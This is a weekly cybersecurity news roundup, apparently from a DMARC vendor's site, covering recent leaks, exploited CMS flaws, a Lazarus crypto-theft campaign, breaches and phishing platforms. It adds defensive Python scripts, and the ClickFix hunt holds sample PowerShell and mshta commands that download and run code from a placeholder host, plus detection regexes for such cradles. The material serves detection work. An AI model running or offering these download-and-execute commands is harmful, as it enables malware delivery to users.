GovCloud Keys Exposed, Drupal Flaw Exploited, Lazarus Crypto Theft
Quick Answer
Cybersecurity headlines this week include exposed AWS GovCloud keys, active Drupal SQL injection attacks, Lazarus Group crypto thefts, major healthcare data breaches, and phishing campaigns bypassing MFA. Experts urge rapid patching, stronger DMARC enforcement, and improved threat detection.
The biggest stories from the past week, curated for the dmarcreport.com community
CISA Contractor Exposed AWS GovCloud Keys and Sensitive Government Credentials on Public GitHub
In what one security researcher described as the worst leak he had ever witnessed in his career, a CISA contractor inadvertently published a treasure trove of government secrets to a public GitHub repository.
The repository, named “Private-CISA” and maintained by contractor Nightwing, exposed AWS administrative credentials, access keys, tokens, plaintext usernames and passwords for internal CISA systems, and SSH keys. Security researchers confirmed the authenticity of the leak, with some credentials reportedly still functional.
On May 14, GitGuardian found the public repository, which had been live since November 13, 2025, and contained 844 MB of data — including plain-text passwords, AWS tokens, Entra ID SAML certificates, CI/CD build logs, Kubernetes manifests, and deployment workflow documentation.
The exposed archive also documented how CISA builds and deploys software internally. Researchers confirmed that the CISA administrator of the repository had explicitly disabled GitHub's push protection, the secret-scanning control that is enabled by default on public repositories and blocks pushes containing detected credentials such as SSH private keys and cloud access keys. CISA pulled the repository offline within 26 hours of being notified and said it was implementing additional safeguards.
Drupal SQL Injection Flaw CVE-2026-9082 Actively Exploited — 15,000+ Attacks Across 65 Countries
A critical vulnerability in Drupal Core is now under aggressive exploitation just days after patches were released.
CVE-2026-9082 is an SQL injection vulnerability affecting all supported versions of Drupal Core, allowing privilege escalation and remote code execution via specially crafted requests sent through the database abstraction API. In an update on May 22, 2026, Drupal acknowledged that “exploit attempts are now being detected in the wild.” Imperva observed over 15,000 attack attempts targeting almost 6,000 individual sites across 65 countries.
Almost half of those attacks were aimed at gaming and financial services websites — sectors where credential theft and financial data access have immediate monetization paths. CISA added the flaw to its Known Exploited Vulnerabilities catalogue on May 22, giving federal agencies a tight remediation deadline. Drupal administrators are urged to upgrade to patched versions (10.4.10, 10.5.10, 10.6.9, 11.1.10, 11.2.12, or 11.3.10) immediately.
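Because the fix ships as a separate point release on each supported branch, a plain numeric comparison gets this wrong (10.6.8 is "higher" than 10.5.10 but still vulnerable). The following branch-aware check is an added example for this roundup, not code from the Drupal project; the six patched versions are the ones named above, while the inventory, the hostnames and the treatment of pre-release suffixes are constructed assumptions.

```python
"""Branch-aware check of Drupal core versions against the CVE-2026-9082 fixed releases.

Added example for this roundup, not code from the Drupal project. The six
patched versions are the ones named in the story; the inventory, hostnames
and the handling of pre-release suffixes are constructed assumptions.
"""

# Fixed releases per minor branch, as (major, minor, patch, is_final).
PATCHED = {
    (10, 4): (10, 4, 10, 1),
    (10, 5): (10, 5, 10, 1),
    (10, 6): (10, 6, 9, 1),
    (11, 1): (11, 1, 10, 1),
    (11, 2): (11, 2, 12, 1),
    (11, 3): (11, 3, 10, 1),
}


def parse_version(text):
    """Turn '10.5.9' or '11.2.12-rc1' into (major, minor, patch, is_final).

    A pre-release suffix sorts below the final release of the same number,
    so 11.2.12-rc1 is not counted as carrying the 11.2.12 fix (assumption).
    """
    core, _, suffix = text.strip().partition("-")
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Drupal version: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch, 0 if suffix else 1)


def assess(version_text):
    """Return 'patched', 'vulnerable' or 'unsupported' for one core version.

    The comparison is per minor branch: 10.6.8 is numerically above 10.5.10
    but still vulnerable, because the fix for the 10.6 branch is 10.6.9.
    """
    version = parse_version(version_text)
    fixed = PATCHED.get(version[:2])
    if fixed is None:
        # No fixed release exists for this branch, so it is out of support and
        # needs a branch upgrade rather than a point release.
        return "unsupported"
    return "patched" if version >= fixed else "vulnerable"


def triage(inventory):
    """Map host -> status so the vulnerable sites can be patched first."""
    return {host: assess(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory; hostnames are placeholders.
    sample = {
        "www.example.org": "10.5.9",
        "intranet.example.org": "10.6.8",
        "shop.example.org": "11.2.12",
        "legacy.example.org": "9.5.11",
    }
    for host, status in triage(sample).items():
        print(f"{host:22} {sample[host]:10} {status}")
```

Feed it the output of `drush status --field=drupal-version` (or the `core/lib/Drupal.php` VERSION constant) from each site; anything reported as unsupported has no point release to install and needs a branch upgrade.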
North Korea’s Lazarus Group Steals $577M in Crypto Using Fileless RemotePE Malware
North Korea’s Lazarus Group has surfaced with a dangerous new playbook targeting financial and cryptocurrency organizations worldwide.
The campaign centers on RemotePE, a fileless remote access trojan that runs entirely in memory, leaving little forensic residue for conventional tools to detect. Lazarus operators pose as trading firm employees on Telegram, then use fake versions of Calendly and Picktime to arrange meetings and make the lure feel like a routine professional exchange.
The Lazarus Group has already stolen about $577 million in cryptocurrency in the first four months of 2026, accounting for 76% of all crypto thefts worldwide despite just two major hacking incidents, according to blockchain analytics firm TRM Labs. The group's cumulative haul since 2017 now exceeds $6 billion, funds that allegedly finance the country's weapons and nuclear development programs.
Running only in memory leaves file-based antivirus and disk-oriented forensics with nothing to scan. Detection has to come from behavioral telemetry (process injection, unusual child processes, outbound connections from otherwise trusted processes) and from memory acquisition and analysis, capabilities many organizations have not yet deployed.
NYC Health + Hospitals Confirms 1.8 Million Patients Hit in Major Biometric Data Breach
One of the largest healthcare breaches of 2026 was formally confirmed this week, with the scale and sensitivity of the stolen data raising serious alarms.
The New York City public healthcare system said hackers stole personal and medical data, and scans of biometrics — including fingerprints — in one of the largest recorded breaches of 2026. Hackers had access to its network from November 2025 until February 2026, with entry attributed to a breach at a third-party vendor.
Exposed data includes patients’ health insurance plan and policy information, medical information such as diagnoses, medications, tests, and imagery, as well as billing, claims, and payment information. Social Security numbers, passports, driver’s licenses, and “precise geolocation data” were also compromised.
The healthcare system is offering 24 months of complimentary credit monitoring to all affected individuals. The breach underscores the critical need for healthcare organizations to vet third-party vendor security postures rigorously.
Ubiquiti Patches Five UniFi OS Vulnerabilities Including Three with Maximum CVSS Score of 10.0
Millions of businesses relying on Ubiquiti networking gear received an urgent security update this week.
Three of the five flaws carry the maximum CVSS score of 10.0. The first (CVE-2026-34908) is an improper access control weakness in UniFi OS that lets attackers make unauthorized changes to targeted systems; the second (CVE-2026-34909) is a path traversal that exposes files on the underlying system; the third (CVE-2026-34910) is an improper input validation bug that allows command injection by anyone with network access to the device.
The three maximum-severity vulnerabilities are exploitable remotely without privileges, requiring no authentication or user interaction. Researchers estimate that nearly 100,000 UniFi OS endpoints are accessible online, creating a large attack surface. Ubiquiti has released patched firmware and urges all administrators to update immediately, particularly for internet-facing deployments.
INTERPOL Operation Ramz: 201 Arrested in Landmark MENA Cybercrime Crackdown
INTERPOL announced the results of the first coordinated cybercrime operation of its scale across the Middle East and North Africa region.
Operation Ramz, conducted between October 2025 and February 28, 2026, involved 13 MENA countries and aimed to investigate and disrupt malicious infrastructure, identify suspects, and prevent future losses. The operation resulted in 201 arrests, the identification of 382 additional suspects, the identification of 3,867 victims, and the seizure of 53 servers. Nearly 8,000 pieces of intelligence were disseminated across participating countries.
The operation also dismantled a phishing-as-a-service platform after Algerian authorities confiscated its server along with hard drives containing phishing software and scripts. Moroccan officials seized computers and smartphones containing banking data and phishing tools. Participating nations included Algeria, Bahrain, Egypt, Iraq, Jordan, Lebanon, Libya, Morocco, Oman, Palestine, Qatar, Tunisia, and the UAE.
DMARC relevance: Phishing-as-a-service kits like the one seized in Algeria depend on mail that appears to come from a trusted domain. Security practitioners recommend publishing SPF and DKIM and enforcing DMARC on top of them so that receiving servers can reject spoofed messages, which strengthens domain authentication and shrinks the pool of victims such operations can reach.
EvilTokens PhaaS Platform Bypasses MFA to Compromise Microsoft 365 Organizations at Scale
A phishing-as-a-service platform that bypasses multi-factor authentication entirely continued to make headlines this week with an update on its extraordinary reach.
EvilTokens went live in February 2026. Within five weeks, it had compromised more than 340 Microsoft 365 organizations across five countries. The platform is sold as a turnkey service via Telegram bots, offering ready-made phishing pages, Microsoft API automation, and AI-generated emails.
Unlike most phishing kits, which mimic login pages to capture credentials, EvilTokens abuses Microsoft's legitimate device code authentication flow: the victim is sent to Microsoft's real sign-in page and enters an attacker-generated code, completing MFA themselves and unknowingly authorizing a session the attacker started. In advanced cases, EvilTokens converts the stolen tokens into a Primary Refresh Token, enabling silent sign-on across all Microsoft 365 applications with no further password or MFA prompt.
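Because the sign-in itself is genuine, the trace it leaves is a successful device-code authentication, usually from a network the user has never used. The hunt below is an added example for this roundup, not part of the EvilTokens research or any Microsoft tooling. The field names follow the Microsoft Graph signIn resource (authenticationProtocol, ipAddress, userPrincipalName, appDisplayName, status), the log lines are constructed, and the trusted network range and severity scheme are assumptions.

```python
"""Flag device-code-flow sign-ins in Entra ID sign-in logs.

Added example for this roundup, not part of the EvilTokens research or any
Microsoft tool. Field names follow the Microsoft Graph `signIn` resource;
the records, the trusted network and the severity scheme are assumptions.
"""
import ipaddress
import json

# Assumed corporate egress range; anything else is treated as unexpected.
TRUSTED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed sample: JSON lines in the shape of Graph sign-in records.
SAMPLE_LOG = """
{"userPrincipalName":"alice@example.com","appDisplayName":"Microsoft Office","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.10","status":{"errorCode":0}}
{"userPrincipalName":"bob@example.com","appDisplayName":"Microsoft Authentication Broker","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.77","status":{"errorCode":0}}
{"userPrincipalName":"carol@example.com","appDisplayName":"Azure CLI","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.22","status":{"errorCode":0}}
{"userPrincipalName":"dave@example.com","appDisplayName":"Microsoft Authentication Broker","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.78","status":{"errorCode":50126}}
"""


def is_trusted(ip_text):
    """True when the source address falls inside an assumed corporate range."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_NETWORKS)


def classify(record):
    """Return a severity for one sign-in record, or None if it is not of interest."""
    if record.get("authenticationProtocol") != "deviceCode":
        return None
    if record.get("status", {}).get("errorCode", 0) != 0:
        return "low"      # failed device-code attempt: keep for context, do not page
    if is_trusted(record.get("ipAddress", "")):
        return "medium"   # admin tooling legitimately uses device code from the office
    return "high"         # successful device-code sign-in from an untrusted network


def hunt(log_text):
    """Parse JSON lines and return (severity, upn, app, ip) for each flagged sign-in."""
    hits = []
    for line in log_text.strip().splitlines():
        record = json.loads(line)
        severity = classify(record)
        if severity:
            hits.append((severity, record["userPrincipalName"],
                         record["appDisplayName"], record["ipAddress"]))
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(hits, key=lambda h: order[h[0]])


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(*hit)
```

The preventive control is a Conditional Access policy that uses the "Authentication flows" condition to block device code flow for every user who does not need it; the hunt above is for what slips through the exceptions. Tune TRUSTED_NETWORKS to the egress ranges the tenant actually uses.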
DMARC relevance: Because EvilTokens delivers its lures via email impersonating SharePoint, DocuSign, and payroll services, enforcing DMARC on inbound mail (honoring the impersonated domain's reject or quarantine policy) is a critical first line of defense that keeps messages spoofing those brands' domains out of inboxes. Lures sent from lookalike or attacker-owned domains pass DMARC, so content filtering and user awareness still matter.
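Both the Operation Ramz note above and this one come down to the same question: does a domain's published SPF and DMARC actually let receivers reject spoofed mail, or does it only monitor? The grader below is an added example for this roundup, not DMARC Report's own checker. The records are constructed strings for a hypothetical domain; a real check would fetch them from DNS first (for example `dig TXT _dmarc.example.com`).

```python
"""Grade SPF and DMARC TXT records for enforcement strength.

Added example for this roundup, not DMARC Report's own checker. The records
in __main__ are constructed; fetch real ones from DNS before passing them in.
"""
import re

# Mechanisms and modifiers that cost one of the ten permitted DNS lookups.
LOOKUP_TERMS = ("include", "a", "mx", "ptr", "exists", "redirect")


def parse_tags(record):
    """Split 'v=DMARC1; p=none; rua=...' into a dict of tag -> value."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def grade_spf(record):
    """Return a list of findings for an SPF record (empty list means no concerns)."""
    findings = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record"]
    last = terms[-1].lower()
    if last in ("+all", "all"):
        findings.append("'+all' authorises every sender; use '-all'")
    elif last == "?all":
        findings.append("'?all' is neutral and offers no protection; use '-all'")
    elif last == "~all":
        findings.append("'~all' softfails; acceptable while testing, but DMARC alignment is what blocks spoofing")
    elif last != "-all":
        findings.append("record does not end in an 'all' mechanism")
    lookups = sum(1 for t in terms
                  if re.split(r"[:=/]", t.lower().lstrip("+-~?"))[0] in LOOKUP_TERMS)
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup mechanisms exceeds the limit of 10; SPF will permerror")
    return findings


def grade_dmarc(record):
    """Return (enforcement_level, findings) for a DMARC record."""
    tags = parse_tags(record)
    if tags.get("v") != "DMARC1":
        return "none", ["not a DMARC record"]
    findings = []
    policy = tags.get("p", "none").lower()
    pct = int(tags.get("pct", "100"))
    if policy == "none":
        findings.append("p=none only monitors; spoofed mail is still delivered")
    if pct < 100:
        findings.append(f"pct={pct} applies the policy to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address, so no aggregate reports showing who spoofs the domain")
    if "sp" not in tags:
        findings.append("no sp= tag; subdomains inherit p=, which is fine only if intended")
    if policy == "reject" and pct == 100:
        level = "enforced"
    elif policy in ("quarantine", "reject"):
        level = "partial"
    else:
        level = "monitor-only"
    return level, findings


if __name__ == "__main__":
    # Constructed records for a hypothetical domain.
    weak_spf = "v=spf1 include:_spf.example.net ?all"
    strong_spf = "v=spf1 include:_spf.example.net -all"
    weak_dmarc = "v=DMARC1; p=none; pct=50"
    strong_dmarc = "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@example.com"
    for r in (weak_spf, strong_spf):
        print(r, "->", grade_spf(r) or "ok")
    for r in (weak_dmarc, strong_dmarc):
        print(r, "->", grade_dmarc(r))
```

A domain only reaches "enforced" with p=reject at pct=100; anything less still delivers some spoofed mail, and without an rua= address the owner never sees the aggregate reports that show it happening.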
Verizon 2026 Data Breach Investigations Report Reveals Vulnerabilities Exploited Faster Than Ever
The annual Verizon DBIR landed this week, and its findings paint a stark picture of the evolving threat landscape.
Attackers are increasingly exploiting organizations that fail to patch internet-facing systems quickly enough. The DBIR highlights that only 26% of critical vulnerabilities listed in the CISA Known Exploited Vulnerabilities catalogue were fully remediated during 2025, down from 38% the previous year.
The most frequent causes of breaches continue to heavily involve the human element — including social engineering, phishing, and stolen credentials — as well as the exploitation of software vulnerabilities. Mobile devices are now a favored target, with attackers moving to mobile phishing as organizations get better at spotting traditional email-based lures.
The report also flagged AI-assisted attacks as a rapidly rising trend, warning that AI is being used to identify vulnerabilities faster than many security teams can respond.
Ghost CMS SQL Injection CVE-2026-26980 Exploited to Fuel Large-Scale ClickFix Attacks
Threat actors have weaponized a critical flaw in the Ghost content management system to compromise hundreds of websites and redirect visitors to malware distribution channels.
The campaign involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost's Content API that allows an unauthenticated attacker to read arbitrary data from the database, including the site's Admin API key. With that key, the attacker can use the Admin API to inject malicious JavaScript into the site's pages.
The injected scripts then redirect site visitors to ClickFix lures — social engineering prompts that trick users into manually executing malicious PowerShell commands under the guise of “fixing” a browser issue. The flaw was patched in Ghost version 6.19.1 back in February 2026, but a large number of sites have not yet applied the update. Website administrators are urged to upgrade immediately.
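The ClickFix step leaves a distinctive trace on the endpoint: the user pastes the command into the Run dialog or a terminal, so the interpreter's parent is explorer.exe and the command line pulls and executes a second stage. The scoring hunt below is an added example for this roundup, not from the Ghost advisory or any vendor tool. The events are constructed dicts in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine); the indicator regexes, the weights and the threshold are assumptions.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry.

Added example for this roundup, not from the Ghost advisory or a vendor tool.
Events are constructed in the shape of Sysmon Event ID 1; the indicators,
weights and threshold are assumptions to tune against local baselines.
"""
import re

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
USER_LAUNCHERS = ("explorer.exe",)   # the Run dialog (Win+R) spawns from explorer.exe

# Command-line traits typical of pasted cradles, as (name, regex) pairs.
INDICATORS = [
    ("encoded", re.compile(r"(?i)\s-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden", re.compile(r"(?i)\s-w(indowstyle)?\s+hidden")),
    ("download", re.compile(r"(?i)(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|mshta\s+https?://)")),
    ("execute", re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("bypass", re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass")),
]

# Constructed sample events; paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://cdn.example.invalid/fix.ps1)"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/x.hta"},
]


def score(event):
    """Return (score, matched_indicator_names) for one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return 0, []
    matched = [name for name, rx in INDICATORS if rx.search(event["CommandLine"])]
    points = len(matched)
    if parent in USER_LAUNCHERS:
        points += 2   # a human typed or pasted this; scheduled admin scripts rarely come from explorer.exe
    return points, matched


def hunt(events, threshold=3):
    """Return (score, indicators, event) for events at or above the threshold, highest first."""
    hits = []
    for event in events:
        points, matched = score(event)
        if points >= threshold:
            hits.append((points, matched, event))
    return sorted(hits, key=lambda h: -h[0])


if __name__ == "__main__":
    for points, matched, event in hunt(SAMPLE_EVENTS):
        print(points, matched, event["CommandLine"])
```

The inventory script in the second event scores only one point despite its execution-policy bypass, which is the intended behaviour: the signal is the combination of a user-launched interpreter with a download-and-execute cradle, not any single switch. On a host that fires, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU usually still holds the pasted command.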
Laravel-Lang Supply Chain Attack Delivers Credential-Stealing Framework via Composer Packages
Developers relying on popular PHP localization packages received an unpleasant surprise this week as a sophisticated supply chain attack was uncovered.
Attackers targeted multiple PHP packages belonging to Laravel-Lang, abusing GitHub version tags to distribute malicious code through Composer packages. Affected packages include laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions. “The timing and pattern of the newly published tags point to a broader compromise of the Laravel-Lang organization’s release process, rather than a single malicious package version,” security firm Socket said.
The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart, indicating automated mass tagging or republishing. More than 700 versions associated with these packages were identified. The malicious packages delivered a comprehensive credential-stealing framework capable of exfiltrating developer secrets, API keys, and cloud credentials.
YellowKey BitLocker Bypass Vulnerability CVE-2026-45585 Disclosed — Microsoft Rushes Mitigation
A newly disclosed zero-day capable of bypassing Windows BitLocker encryption attracted urgent attention from security teams this week.
Microsoft released a mitigation for a BitLocker security feature bypass vulnerability publicly named YellowKey, now tracked as CVE-2026-45585 with a CVSS score of 6.8. "Microsoft is aware of a security feature bypass vulnerability in Windows publicly referred to as 'YellowKey,'" the company stated. Microsoft also addressed BlueHammer (CVE-2026-33825), a privilege escalation bug in Windows Defender. The researcher who discovered the flaw published exploit code for it after notifying Microsoft and growing frustrated with the response time.
BitLocker bypass vulnerabilities are particularly concerning for organizations relying on disk encryption as a primary data protection control for lost or stolen devices.

Roblox Account Hijacking Ring Dismantled — 610,000 Accounts Stolen, $225K in Illicit Profits
Law enforcement struck a blow against gaming-focused cybercrime this week, dismantling a sophisticated account-theft operation.
Ukrainian police dismantled a hacking ring responsible for hijacking and selling over 610,000 Roblox accounts. The Roblox account hijacking ring generated roughly $225,000 in illicit profits and demonstrates the growing monetization of gaming-related cybercrime.
The operation highlights that gaming platforms are increasingly attractive targets for cybercriminals, not only for in-game currency theft but as a gateway to credential stuffing attacks against other platforms where victims reuse passwords. Parents and young users of gaming platforms are urged to enable two-factor authentication and use unique passwords for every account.
General Manager
Founder and General Manager of DuoCircle. Product strategy and commercial lead for DMARC Report's 2,000+ customer base.